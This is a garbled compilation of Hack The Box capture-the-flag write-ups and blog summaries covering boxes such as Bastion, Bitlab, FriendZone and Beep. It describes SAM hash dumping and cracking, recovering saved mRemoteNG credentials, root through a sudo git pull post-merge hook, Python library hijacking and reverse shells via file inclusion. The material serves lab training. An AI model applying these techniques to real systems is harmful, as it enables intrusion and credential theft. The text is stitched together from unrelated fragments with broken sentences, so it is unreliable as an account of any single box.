After reading various write ups and guides online, I was able to root this machine! Using nmapwe are able to determine the open ports and running services on the machine.
Not much can be done with the ssh service as we do not have any credentials on hand so lets come back to it later. As for the smb service, maybe we can try logging into it and see what we can find? Alright, the Backups share seems interesting. Lets check it out.
Looks like someone left a note. At this point of time, I did not understand the meaning of this message so I simply ignored it. Another thing that caught my attention was the WindowsImageBackup directory. Oh no this feels like a rabbit hole already but Backup seems hopeful.
Lets try downloading them. What just happened? Was the file too big to be transferred? This was where I finally understood the message when it said don't transfer the entire backup file and the VPN to the subsidiary office is too slow. After downloading the. Seems like a rather normal looking Windows file system. Maybe we can dump out the passwords using these files? Using the samdump2 command, we were able to extract the account hashes. Following up, we used john to cracked the NT hashes in hash.
Bingo, we got it! The user. As l4mpjewe first checked out the installed programs. Lets see what version of mRemoteNG is installed by checking the Changelog. Seems like the version is 1. Lets see if we can find any exploits regarding mRemoteNG. Since I did not have meterpreter session on the machine, I found some other alternative. Hack The Box - Bastion hackthebox smb mremoteng windows ssh Sep 7, Nmap done : 1 IP address 1 host up scanned in D 0 Wed Aug 28 D 0 Fri Feb 22 D 0 Fri Feb 22 9b9cfbcee9-a17ce6f6e The connection is disconnected now What just happened?
After setting up the Commando VM, I attempted to access the share and it worked! All rights reserved.September 07, Bastion was an easy box where we had to find an open SMB share that contained a Windows backup. We then find a mRemoteNG configuration file that contains encrypted credentials for the administrator. The system flag blood was still up for grab when I reached that stage so instead of reversing the encryption for the configuration file I just installed the mRemoteNG application on a Windows VM, copied the config file over and was able to log in as administrator.
OpenSSH is running on the Windows machine. As this is not a standard Windows service, I make note of it as this might be needed to log in later when we find credentials. The note. The backup directory contains two. I use the vhdimount utility to mount the remote. I do some recon and found the mRemoteNG application is installed on the system. As such, it supports saving the credentials locally in a configuration file. I immediately see that it contains an RDP session configuration for user Administrator :.
Because I was under time pressure to get the system flag, I decided to spin up a Windows VM and install mRemoteNG instead of trying to find a way to recover the password. I found some ruby script on packetstorm that decrypts the password but it only works for CBC mode and therefore was of no use for me here. I installed mRemoteNG portable edition then replaced the confCons. D 0 Sun Apr 28 D 0 Sun Apr 28 note. Bin' -rwxrwxrwx 1 root root 24 Jun 10 autoexec. All rights reserved.The home page is redirected to the sign in page.
The bottom has 2 links of interest. Explore and Help. Explore link bring us to the Projects page where we can see current projects, groups and snippets. All links except Gitlab Login point to external sites.
To find out what the variable contains, we can use the development console. The easiest way to use this credentials is to bookmark the link right click on the link :. The credentials is populated to the sign in form. How convenient. Of course, we can also simply type in the credentials ourselves.
Bitlab – HackTheBox writeup
Now click on Sign In and we sign successful in to the application. This Gitlab allows us to maintain our projects. Essentially, we can upload any files to the project. This will use ip-address Sure enough, we are able to perform git pull. So do some researches on Google and I am able to find out a feature call git hook. Couple good read can be found at:. For git pullhook post-merge scripts can be used and will be triggered when a merge occurs.
To achieve that, we will create a local copy of the project Profile. Then make some changes and perform a merge. And finally doing a sudo git pull on the local copy will trigger the custom post-merge script defined in the local copy.
Privilege Escalation Vulnerability: sudo git pull Explanation: hook script for post-merge can be defined to perform code execution as root Enumeration nmap -p- -A -T4 Help page only has a bookmarks. The easiest way to use this credentials is to bookmark the link right click on the link : Now go back to the login page and select the bookmarked link: The credentials is populated to the sign in form.
Now click on Sign In and we sign successful in to the application This Gitlab allows us to maintain our projects. Now make it available to the website.URL : machines There are quite a few port open. I started enum4linux on the machine Ip to see if I can find anything interesting. In development I found two files named hello. In the general I found a file name creds.
I decided to move on with the my enumeration. So I decided to use the domain name that is friendzone. I found another domain name administrator1. So if we visit that we are greeted with a plain and simple login page.
HackTheBox Giddy Write Up
If we use those params we get a random image. The only way to test our theory is to upload a reverse shell on that server and try to include it. We can try these credentials to login via SSH. I was in friend account and I think this is where I was supposed to find the user flag. Since I am in the system I dowloaded the enumeration script from system and ran it. Next I checked the sudo rights and nothing :. Next were the process running but nothing in the process.
After looking around and googling a bit I found privilege-escalation-via-python-library-hijacking.
According to this I can just edit the imported library, in our case os and hope it works. User Once I was in I simply took the flag from the user directory. Privilege escalation Since I am in the system I dowloaded the enumeration script from system and ran it. To download the enumeration script: Run python http server i.
Next I checked the sudo rights and nothing : Next were the process running but nothing in the process. So I started looking in the directories manually. After around 15 minutes or maybe more I finally found something interesting to look. After looking around and googling a bit I found privilege-escalation-via-python-library-hijacking According to this I can just edit the imported library, in our case os and hope it works ; First I found the path for the python.Traverxec was a relatively easy box that involved enumerating and exploiting a less popular webserver, Nostromo.
After I put out a Lame write-up yesterday, it was pointed out that I skipped an access path entirely - distcc. Yet another vulnerable service on this box, which, unlike the Samba exploit, provides a shell as a user, providing the opportunity to look for PrivEsc paths.HackTheBox - Lazy
It does throw one head-fake with a VSFTPd server that is a vulnerable version, but with the box configured to not allow remote exploitation.
As www-data, I can access the Restic backup agent as root, and exploit that to get both the root flag and a root ssh key. I recently ran into a challenge where I was given a Java Jar file that I needed to analyze and patch to exploit.
Sniper involved utilizing a relatively obvious file include vulnerability in a web page to get code execution and then a shell. The first privesc was a common credential reuse issue. The second involved poisoning a. Most of the time, this is managed by the package management system. When you run apt install x, it may do some of this behind the scenes for you.
But there are times when it is really useful to know how to interact with this yourself. Forest is a great example of that. Then I can take advantage of the permissions and accesses of that user to get DCSycn capabilities, allowing me to dump hashes for the administrator user and get a shell as the admin.
Postman was a good mix of easy challenges providing a chance to play with Redis and exploit Webmin. That same password provides access to the Webmin instance, which is running as root, and can be exploited to get a shell. BankRobber was neat because it required exploiting the same exploit twice. I can overwrite that myself to get a shell. Scavenger required a ton of enumeration, and I was able to solve it without ever getting a typical shell.
The box is all about enumerating the different sites on the box and using an SQL injection in whois to get them alland finding one is hacked and a webshell is left behind.
Json involved exploiting a.
NET deserialization vulnerability to get initial access, and then going one of three ways to get root. Still, it got patched, and two unintended paths came about as well, and everything turned out ok.
This has now been patched, but I thought it was interesting to see what was configured that allowed this non-admin user to get a shell with PSExec. AI was a really clever box themed after smart speakers like Echo and Google Home. Player involved a lot of recon, and pulling together pieces to go down multiple different paths to user and root.
I can use that information to get credentials where I can SSH, but only with a very limited shell. However, I can use an SSH exploit to get code execution that provides limited and partial file read, which leads to more credentials.
Those credentials are good for a Codiad instance running on another of the virtual hosts, which allows me to get a shell as www-data.Let's start with a TCP scan of the target ip address to determine which ports are open and which services are running on those ports:. Okay so there are a few ports open! There are the standard ports that are common on these boxes, SSH on Port 22 and HTTP on Port 80 but it also seems that there is mail server present on this machine with common mail ports and protcols in use, SMTP, Pop3, IMAP etc with what also seems like a webmin admin login portal on port and last but not least, mysql is also running on the machine.
When we browse to As default credentials dont seems to work on the login panel and nothing of not in the page source code, lets run a gobuster on Port After looking at several of these exploits, the 'graph. So this page lists the default freePBX database configuration, along with usernames and passwords! After logging into freePBX with the changed password, there was no luck with gaining a foothold via the portal.
We are root! I enjoyed this box as it had multiple avenues for exploitation, via the LFI which i used or via port by utilising a blind payload in the user-agent field. I think that this box is quite realistic as im sure that the same password is used for multiple accounts, of varying permissions, aswell as running out of date and vulnerable software! HacktheBox - Beep Writeup.
Reconnaissance 1. Enumeration - Port Browse to Okay, so this looks a little messy, lets view the page source to make it easier to read! Foothold - Root via LFI.
Logging into Beep via SSH. What did I learn from Beep? Conclusion Thanks for reading! Next up is Box 12 - Granny!Toggle navigation absolomb's security blog. However I made time for this box as it was not only created by my friend burmat but it also involved software that I heavily used as a sysadmin which made me more interested I really enjoyed this box a lot as it took some creative thinking to get the initial shell and required analyzing and writing some python.
Poision is a pretty straight forward box overall but did include a couple of unique things which made it fun. Pretty fun and quick box with some creative thinking required for getting the initial shell.
I thought this was a fun quick box. I remember when Heartbleed was all the craze, but I had never actually exploited it before Valentine. The box maker did a good job setting up extracting sensitive information out out memory via the vulnerability and giving us a nice simulation of I liked Aragog simple because it had me do a few new things for initial access and root.
Overall not super difficult but still fun.
This writeup is from a few months ago. Tally is enumeration galore, full of red herrings, distractions, and rabbit holes. I spent hours digging through files and directories on this one. Tally will test your patience but it felt like a very realistic box so I enjoyed it. An interesting exploit at the end as well.
This one was a bit of a doozy but pretty well done and required some pretty thorough enumeration. Kudos to the box creator on the creative setup! Sense is kind of mixed box for me. I also wrote up a python script to fully automate the exploitation once you have valid credentials see at This is probably one of the best boxes released on HTB thus far. Each step felt like a treasure hunt, also I really enjoyed getting more familiar with MongoDB as well.
Do yourself a favor and go do this box! Mantis takes a lot of patience and a good bit of enumeration. The final exploit is also pretty cool as I had never done anything like it before. Really happy to see a domain controller finally pop up in HackTheBox.
This is probably the first hard box that I actually enjoyed on HackTheBox. Most of the things clicked and I was able to get through much of it fairly quickly overall. Highly recommend this one. I did this box quite some time ago as it was one of the first ones I did when first starting HackTheBox. I recently helped out someone who was working on this box so I decided to reorganize my notes, as they were somewhat of a mess and restructure them